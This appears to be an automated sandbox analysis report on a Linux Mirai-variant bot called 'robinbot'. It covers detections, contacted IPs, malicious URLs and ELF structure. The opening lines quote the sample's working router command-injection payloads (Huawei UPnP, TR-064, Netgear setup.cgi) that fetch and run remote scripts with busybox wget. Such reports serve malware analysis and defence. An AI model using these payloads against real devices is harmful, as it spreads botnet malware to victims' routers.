              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.203.251.188 -l /tmp/huawei -r /bins.sh;chmod -x huawei;sh /tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: consoleAtTCPBukkitJoinUDPStormMinecraftRandomNameRandomBytesMotdorf;cd /tmp; rm -rf mpsl; cd /tmp; /bin/busybox wget http://89.203.251.188/mipsel && chmod +x mipsel && ./mipsel
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.203.251.188/bins.sh && chmod 777 /tmp/bins.sh && sh /tmp/bins.sh`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /UD/act?1 HTTP/1.1
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.203.251.188/bins.sh && chmod 777 /tmp/bins.sh && sh /tmp/bins.sh`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.203.251.188 -l /tmp/huawei -r /bins.sh;chmod -x huawei;sh /tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://89.203.251.188/bins.sh+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: classification engineClassification label: mal96.troj.evad.lin@0/2@0/0
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/memcpy.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/mempcpy.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/memset.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strchr.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strcmp.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strcpy.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strcspn.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strlen.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strpbrk.S
              Source: robinbotELF static info symbol of initial sample: libc/string/x86_64/strspn.S
              Source: robinbotELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crt1.S
              Source: robinbotELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crti.S
              Source: robinbotELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crtn.S
              Source: robinbotELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/vfork.S

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: /tmp/robinbot (PID: 9446)File: /tmp/robinbotJump to behavior
              Source: /usr/share/apport/apport-gtk (PID: 9499)Queries kernel information via 'uname':
              Source: /usr/share/apport/apport-gtk (PID: 9532)Queries kernel information via 'uname':

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: robinbot, type: SAMPLE
              Source: Yara matchFile source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 9446, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 9448, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 9449, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 9451, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: robinbot, type: SAMPLE
              Source: Yara matchFile source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 9446, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 9448, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 9449, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: robinbot PID: 9451, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Command and Scripting Interpreter
              Path InterceptionPath Interception1
              Masquerading
              OS Credential Dumping1
              Security Software Discovery
              Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
              Non-Standard Port
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              File Deletion
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756090 Sample: robinbot Startdate: 29/11/2022 Architecture: LINUX Score: 96 40 154.228.227.62, 23 ZAINUGASUG Uganda 2->40 42 156.124.138.111, 23 XNSTGCA United States 2->42 44 98 other IPs or domains 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 Yara detected Mirai 2->50 52 Machine Learning detection for sample 2->52 9 robinbot 2->9         started        12 upstart sh 2->12         started        14 upstart sh 2->14         started        16 upstart sh 2->16         started        signatures3 process4 signatures5 54 Sample deletes itself 9->54 18 robinbot 9->18         started        20 sh date 12->20         started        22 sh apport-checkreports 12->22         started        24 sh date 14->24         started        26 sh apport-gtk 14->26         started        28 sh date 16->28         started        30 sh apport-gtk 16->30         started        process6 process7 32 robinbot 18->32         started        34 robinbot 18->34         started        36 robinbot 18->36         started        process8 38 robinbot 32->38         started       
              SourceDetectionScannerLabelLink
              robinbot62%ReversingLabsLinux.Trojan.Mirai
              robinbot66%VirustotalBrowse
              robinbot100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://purenetworks.com/HNAP1/0%URL Reputationsafe
              http://89.203.251.188/bins.sh;sh100%Avira URL Cloudmalware
              http://89.203.251.188/mips14%VirustotalBrowse
              http://89.203.251.188/mipsel16%VirustotalBrowse
              http://89.203.251.188/bins.sh;$100%Avira URL Cloudmalware
              http://89.203.251.188/bins.sh16%VirustotalBrowse
              http://89.203.251.188/mips100%Avira URL Cloudmalware
              http://89.203.251.188/mipsel100%Avira URL Cloudmalware
              http://89.203.251.188/bins.sh;sh$100%Avira URL Cloudmalware
              http://89.203.251.188/bins.sh;chmod100%Avira URL Cloudmalware
              http://89.203.251.188/bins.sh100%Avira URL Cloudmalware
              http://89.203.251.188/bin.sh;chmod100%Avira URL Cloudmalware
              No contacted domains info
              NameSourceMaliciousAntivirus DetectionReputation
              http://89.203.251.188/mipselrobinbotfalse
              • 16%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://89.203.251.188/mipsrobinbotfalse
              • 14%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://89.203.251.188/bins.shrobinbotfalse
              • 16%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://89.203.251.188/bins.sh;shrobinbotfalse
              • Avira URL Cloud: malware
              unknown
              http://89.203.251.188/bins.sh;$robinbotfalse
              • Avira URL Cloud: malware
              unknown
              http://89.203.251.188/bins.sh;sh$robinbotfalse
              • Avira URL Cloud: malware
              unknown
              http://schemas.xmlsoap.org/soap/encoding/robinbotfalse
                high
                http://89.203.251.188/bins.sh;chmodrobinbotfalse
                • Avira URL Cloud: malware
                unknown
                http://89.203.251.188/bin.sh;chmodrobinbotfalse
                • Avira URL Cloud: malware
                unknown
                http://purenetworks.com/HNAP1/robinbotfalse
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/soap/envelope/robinbotfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  201.35.61.151
                  unknownBrazil
                  8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                  38.149.54.119
                  unknownUnited States
                  174COGENT-174USfalse
                  109.170.137.181
                  unknownUnited Kingdom
                  5413AS5413GBfalse
                  6.118.77.236
                  unknownUnited States
                  3356LEVEL3USfalse
                  147.58.96.125
                  unknownUnited States
                  1533DNIC-AS-01533USfalse
                  81.127.100.245
                  unknownItaly
                  3269ASN-IBSNAZITfalse
                  136.39.88.252
                  unknownUnited States
                  16591GOOGLE-FIBERUSfalse
                  126.164.244.69
                  unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                  61.67.139.220
                  unknownTaiwan; Republic of China (ROC)
                  18042KBTKoosBroadbandTelecomTWfalse
                  49.200.41.67
                  unknownIndia
                  4804MPX-ASMicroplexPTYLTDAUfalse
                  18.73.84.40
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  81.164.55.227
                  unknownBelgium
                  6848TELENET-ASBEfalse
                  113.111.170.223
                  unknownChina
                  4816CHINANET-IDC-GDChinaTelecomGroupCNfalse
                  219.117.116.107
                  unknownJapan10010TOKAITOKAICommunicationsCorporationJPfalse
                  36.29.101.74
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  89.230.138.253
                  unknownPoland
                  21021MULTIMEDIA-ASCableDTVInternetVoiceProviderinPolandfalse
                  62.215.115.222
                  unknownKuwait
                  21050FAST-TELCOKWfalse
                  59.144.17.163
                  unknownIndia
                  9498BBIL-APBHARTIAirtelLtdINfalse
                  175.92.178.233
                  unknownChina
                  9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                  18.180.127.60
                  unknownUnited States
                  16509AMAZON-02USfalse
                  115.4.227.195
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  219.101.185.233
                  unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                  208.55.17.111
                  unknownUnited States
                  21928T-MOBILE-AS21928USfalse
                  120.49.233.109
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  182.191.237.46
                  unknownPakistan
                  45595PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKfalse
                  191.16.96.219
                  unknownBrazil
                  26599TELEFONICABRASILSABRfalse
                  223.25.130.150
                  unknownJapan55387RMGR-MIXJapanCommunicationIncJPfalse
                  114.178.65.194
                  unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  190.146.127.103
                  unknownColombia
                  10620TelmexColombiaSACOfalse
                  99.214.230.161
                  unknownCanada
                  812ROGERS-COMMUNICATIONSCAfalse
                  160.154.217.169
                  unknownCote D'ivoire
                  29571ORANGE-COTE-IVOIRECIfalse
                  213.41.96.24
                  unknownUnited Kingdom
                  8220COLTCOLTTechnologyServicesGroupLimitedGBfalse
                  167.180.120.161
                  unknownUnited States
                  59447SAYFANETTRfalse
                  171.6.175.226
                  unknownThailand
                  45758TRIPLETNET-AS-APTripleTInternetTripleTBroadbandTHfalse
                  195.69.176.12
                  unknownUkraine
                  3326DATAGROUPDatagroupPJSCUAfalse
                  187.192.10.153
                  unknownMexico
                  8151UninetSAdeCVMXfalse
                  207.16.176.208
                  unknownUnited States
                  6620AS-6620USfalse
                  1.130.155.22
                  unknownAustralia
                  1221ASN-TELSTRATelstraCorporationLtdAUfalse
                  96.158.69.6
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  116.80.199.207
                  unknownJapan2514INFOSPHERENTTPCCommunicationsIncJPfalse
                  44.120.58.45
                  unknownUnited States
                  7377UCSDUSfalse
                  57.101.184.167
                  unknownBelgium
                  2647SITABEfalse
                  125.65.104.79
                  unknownChina
                  38283CHINANET-SCIDC-AS-APCHINANETSiChuanTelecomInternetDatafalse
                  149.161.218.250
                  unknownUnited States
                  87INDIANA-ASUSfalse
                  38.136.33.70
                  unknownUnited States
                  174COGENT-174USfalse
                  203.244.68.31
                  unknownKorea Republic of
                  18305POSNETPOSCOICTKRfalse
                  187.164.183.126
                  unknownMexico
                  11888TelevisionInternacionalSAdeCVMXfalse
                  64.10.38.215
                  unknownUnited States
                  701UUNETUSfalse
                  204.135.237.106
                  unknownUnited States
                  7726FITC-ASUSfalse
                  220.148.44.31
                  unknownJapan10010TOKAITOKAICommunicationsCorporationJPfalse
                  49.59.1.175
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  173.3.155.16
                  unknownUnited States
                  6128CABLE-NET-1USfalse
                  200.80.242.58
                  unknownArgentina
                  11664TechtelLMDSComunicacionesInteractivasSAARfalse
                  47.205.45.6
                  unknownUnited States
                  5650FRONTIER-FRTRUSfalse
                  8.182.132.211
                  unknownSingapore
                  37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                  156.124.138.111
                  unknownUnited States
                  393504XNSTGCAfalse
                  101.45.38.38
                  unknownChina
                  131536SHGWBNNETShanghaiGreatWallBroadbandNetworkServiceCofalse
                  117.20.248.54
                  unknownKorea Republic of
                  9981SAERONET-AS-KRSaeroNetworkServiceLTDKRfalse
                  101.13.223.104
                  unknownTaiwan; Republic of China (ROC)
                  24158TAIWANMOBILE-ASTaiwanMobileCoLtdTWfalse
                  65.62.218.42
                  unknownUnited States
                  32475SINGLEHOP-LLCUSfalse
                  122.143.153.102
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  125.152.192.190
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  166.252.209.73
                  unknownUnited States
                  22394CELLCOUSfalse
                  22.253.251.152
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  147.79.180.251
                  unknownUnited States
                  14327PGE-ONLINEUSfalse
                  187.176.30.239
                  unknownMexico
                  6503AxtelSABdeCVMXfalse
                  170.14.152.245
                  unknownUnited States
                  27283RJF-INTERNETUSfalse
                  58.147.153.172
                  unknownAfghanistan
                  17411IO-GLOBAL-APIoGlobalServicesPvtLimitedAFfalse
                  67.7.29.224
                  unknownUnited States
                  209CENTURYLINK-US-LEGACY-QWESTUSfalse
                  78.252.226.253
                  unknownFrance
                  12322PROXADFRfalse
                  184.190.166.224
                  unknownUnited States
                  22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                  106.148.127.134
                  unknownJapan2516KDDIKDDICORPORATIONJPfalse
                  122.243.118.80
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  34.229.40.203
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  199.87.129.117
                  unknownUnited States
                  27326VHSA-ASUSfalse
                  51.27.141.208
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  199.33.243.208
                  unknownUnited States
                  22772LOGINUSfalse
                  145.188.254.177
                  unknownNetherlands
                  59524KPN-IAASNLfalse
                  182.129.102.216
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  131.154.12.44
                  unknownItaly
                  137ASGARRConsortiumGARREUfalse
                  89.138.240.83
                  unknownIsrael
                  1680NV-ASNCELLCOMltdILfalse
                  165.123.75.214
                  unknownUnited States
                  55UPENNUSfalse
                  168.189.121.198
                  unknownUnited States
                  53526THECLO-ASNUSfalse
                  74.178.232.94
                  unknownUnited States
                  10796TWC-10796-MIDWESTUSfalse
                  28.6.132.123
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  124.193.153.100
                  unknownChina
                  4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                  120.149.220.29
                  unknownAustralia
                  1221ASN-TELSTRATelstraCorporationLtdAUfalse
                  82.130.119.117
                  unknownSwitzerland
                  559SWITCHPeeringrequestspeeringswitchchEUfalse
                  16.133.163.123
                  unknownUnited States
                  unknownunknownfalse
                  208.71.205.168
                  unknownUnited States
                  23038BRDBND-USER-GRPUSfalse
                  160.32.225.158
                  unknownUnited States
                  32160CTIFIBERUSfalse
                  130.34.115.97
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  104.229.125.170
                  unknownUnited States
                  11351TWC-11351-NORTHEASTUSfalse
                  208.17.252.190
                  unknownUnited States
                  396445QUICKINTLUSfalse
                  142.225.10.214
                  unknownCanada
                  395198BANQUE-NATIONALE-DU-CANADACAfalse
                  9.30.31.111
                  unknownUnited States
                  3356LEVEL3USfalse
                  4.97.223.173
                  unknownUnited States
                  3356LEVEL3USfalse
                  112.226.138.78
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  154.228.227.62
                  unknownUganda
                  37075ZAINUGASUGfalse
                  151.174.62.248
                  unknownUnited States
                  45025EDN-ASUAfalse
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:/usr/share/apport/apport-checkreports
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):14917
                  Entropy (8bit):4.701159938603215
                  Encrypted:false
                  SSDEEP:192:FLzCpJfXz7bDknhn1tizSyu2WaxQEGUEPIyhbM:2Ah8UEGpI
                  MD5:0836D275EE0CC43A1A0B61944975C4B6
                  SHA1:38F30C9078B79D4B4D275FC6B44FA222DFBBF295
                  SHA-256:362C8FBC76D80AE0B74BBAC80FC45FCA202202E57854E5F1083D986C1A154DA5
                  SHA-512:45AB12EBD03E2E5FC9E896D93B4B01A3E2161C46DFE37C5B9A450802963F29A000079D885F815CF026828C13301B89DBC54722F7C32D23D5BFC3059EA67E6F89
                  Malicious:false
                  Reputation:low
                  Preview:ProblemType: Crash.Date: Tue Nov 29 17:27:51 2022.ExecutablePath: /usr/share/apport/apport-checkreports.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-checkreports --system.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 019cc000-01d24000 rw-p 00000000 00:00 0 [heap]. 7f318448b000-7f318460c000 rw-p 00000000 00:00 0 . 7f318460c000-7f3184623000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7f3184623000-7f3184822000 ---p 00017000 fc:0
                  Process:/usr/share/apport/apport-gtk
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):47095
                  Entropy (8bit):4.52783605085601
                  Encrypted:false
                  SSDEEP:384:rJP5bFpeBAm/H/B/Z/JTFdMJ3iSdO2F1qWOcxxsEfXNJQv4eIz/N8CcZAE6S:A/H/B/Z/LdMJ4WOcxxs94eIz/N8CcZAG
                  MD5:DB7F79EB6BC1343703D5FCFF8A831D12
                  SHA1:B55C93B9B8770E4B030AAC5D8334D140DB04EAC0
                  SHA-256:995704D9EAF0F17623400C8CDF0DA870E4AD91C248ADD3B1392C3D8037F00BF5
                  SHA-512:69BD12B24F60C5BCBD64ED08A82B3D885B368511AD56768EBDE8ABDEDA6F25A460F47132A010AEDABEAB4437D62ADE2F821E2FE69BAE306F740C5B1492953A42
                  Malicious:false
                  Reputation:low
                  Preview:ProblemType: Crash.Date: Tue Nov 29 17:27:52 2022.ExecutablePath: /usr/share/apport/apport-gtk.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-gtk.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 01dbe000-022de000 rw-p 00000000 00:00 0 [heap]. 7f56d93c2000-7f56d94c2000 rw-p 00000000 00:00 0 . 7f56d94c2000-7f56d94d9000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7f56d94d9000-7f56d96d8000 ---p 00017000 fc:00 2382
                  File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
                  Entropy (8bit):6.25564436844842
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name:robinbot
                  File size:133298
                  MD5:500009d8f68330a8f82b59884a9afe47
                  SHA1:575f5e6894b1a2f7a728435487666acdb9758f83
                  SHA256:a46770913fba87921b56d789396e07cdfd68a846b2e80a77aa07e1c62f9304d6
                  SHA512:ec62621ec2e037cb9f3890486ff4fb127ee6b34657ee7c2b1e3401de5d7fa2bb554e62d5c378dd93c43a3bb0bf4d210556cf8e67c0ff8449d0c615262e94dfba
                  SSDEEP:3072:xffIDJOocVBUbd8A2W3M/fvLUpANet2xBTd:xgDAtVmB8sM/fvLUpANet2xBTd
                  TLSH:CED306C76E527DBBC2C6EAF96AFBE01084E3B839576A224077C47DA5190ECC41D2D309
                  File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@......}.......}................................Q.......Q.....h........5..............Q.td....................................................H...._....J...H........

                  ELF header

                  Class:
                  Data:
                  Version:
                  Machine:
                  Version Number:
                  Type:
                  OS/ABI:
                  ABI Version:
                  Entry Point Address:
                  Flags:
                  ELF Header Size:
                  Program Header Offset:
                  Program Header Size:
                  Number of Program Headers:
                  Section Header Offset:
                  Section Header Size:
                  Number of Section Headers:
                  Header String Table Index:
                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                  NULL0x00x00x00x00x0000
                  .initPROGBITS0x4000e80xe80x130x00x6AX001
                  .textPROGBITS0x4001000x1000x116780x00x6AX0016
                  .finiPROGBITS0x4117780x117780xe0x00x6AX001
                  .rodataPROGBITS0x4117a00x117a00x65f10x00x2A0032
                  .eh_framePROGBITS0x417d940x17d940x40x00x2A004
                  .ctorsPROGBITS0x5180000x180000x100x00x3WA008
                  .dtorsPROGBITS0x5180100x180100x100x00x3WA008
                  .jcrPROGBITS0x5180200x180200x80x00x3WA008
                  .dataPROGBITS0x5180400x180400x5280x00x3WA0032
                  .bssNOBITS0x5185800x185680x2f900x00x3WA0032
                  .commentPROGBITS0x00x185680xc180x00x0001
                  .shstrtabSTRTAB0x00x191800x660x00x0001
                  .symtabSYMTAB0x00x195a80x4bd80x180x0142728
                  .strtabSTRTAB0x00x1e1800x27320x00x0001
                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                  LOAD0x00x4000000x4000000x17d980x17d986.66800x5R E0x100000.init .text .fini .rodata .eh_frame
                  LOAD0x180000x5180000x5180000x5680x35102.15320x6RW 0x100000.ctors .dtors .jcr .data .bss
                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                  NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                  .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  .symtab0x4000e80SECTION<unknown>DEFAULT1
                  .symtab0x4001000SECTION<unknown>DEFAULT2
                  .symtab0x4117780SECTION<unknown>DEFAULT3
                  .symtab0x4117a00SECTION<unknown>DEFAULT4
                  .symtab0x417d940SECTION<unknown>DEFAULT5
                  .symtab0x5180000SECTION<unknown>DEFAULT6
                  .symtab0x5180100SECTION<unknown>DEFAULT7
                  .symtab0x5180200SECTION<unknown>DEFAULT8
                  .symtab0x5180400SECTION<unknown>DEFAULT9
                  .symtab0x5185800SECTION<unknown>DEFAULT10
                  .symtab0x00SECTION<unknown>DEFAULT11
                  .symtab0x00SECTION<unknown>DEFAULT12
                  .symtab0x00SECTION<unknown>DEFAULT13
                  .symtab0x00SECTION<unknown>DEFAULT14
                  CROSSWEB_IPGen.symtab0x4031f0246FUNC<unknown>DEFAULT2
                  DLINK_IPGen.symtab0x402e90246FUNC<unknown>DEFAULT2
                  GPON1_Range.symtab0x51808020OBJECT<unknown>DEFAULT9
                  GPON2_Range.symtab0x5180a0112OBJECT<unknown>DEFAULT9
                  GPON8080_IPGen.symtab0x4058001311FUNC<unknown>DEFAULT2
                  GPON80_IPGen.symtab0x4051701508FUNC<unknown>DEFAULT2
                  HNAP_IPGen.symtab0x4033b0246FUNC<unknown>DEFAULT2
                  HUAWEI_IPGen.symtab0x4037d01164FUNC<unknown>DEFAULT2
                  JAWS_IPGen.symtab0x403050246FUNC<unknown>DEFAULT2
                  LOCAL_ADDR.symtab0x51aa044OBJECT<unknown>DEFAULT10
                  NETGEAR_IPGen.symtab0x403d802312FUNC<unknown>DEFAULT2
                  R7000_IPGen.symtab0x402cd0246FUNC<unknown>DEFAULT2
                  REALTEK_IPGen.symtab0x4047c02312FUNC<unknown>DEFAULT2
                  TR064_IPGen.symtab0x403610246FUNC<unknown>DEFAULT2
                  VARCON_IPGen.symtab0x402b30246FUNC<unknown>DEFAULT2
                  _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __CTOR_END__.symtab0x5180080OBJECT<unknown>DEFAULT6
                  __CTOR_LIST__.symtab0x5180000OBJECT<unknown>DEFAULT6
                  __C_ctype_b.symtab0x5185108OBJECT<unknown>DEFAULT9
                  __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __C_ctype_b_data.symtab0x417620768OBJECT<unknown>DEFAULT4
                  __C_ctype_tolower.symtab0x5185208OBJECT<unknown>DEFAULT9
                  __C_ctype_tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __C_ctype_tolower_data.symtab0x417920768OBJECT<unknown>DEFAULT4
                  __DTOR_END__.symtab0x5180180OBJECT<unknown>DEFAULT7
                  __DTOR_LIST__.symtab0x5180100OBJECT<unknown>DEFAULT7
                  __EH_FRAME_BEGIN__.symtab0x417d940OBJECT<unknown>DEFAULT5
                  __FRAME_END__.symtab0x417d940OBJECT<unknown>DEFAULT5
                  __GI___C_ctype_b.symtab0x5185108OBJECT<unknown>HIDDEN9
                  __GI___C_ctype_b_data.symtab0x417620768OBJECT<unknown>HIDDEN4
                  __GI___C_ctype_tolower.symtab0x5185208OBJECT<unknown>HIDDEN9
                  __GI___C_ctype_tolower_data.symtab0x417920768OBJECT<unknown>HIDDEN4
                  __GI___ctype_b.symtab0x5185188OBJECT<unknown>HIDDEN9
                  __GI___ctype_tolower.symtab0x5185288OBJECT<unknown>HIDDEN9
                  __GI___errno_location.symtab0x4099286FUNC<unknown>HIDDEN2
                  __GI___fgetc_unlocked.symtab0x411394222FUNC<unknown>HIDDEN2
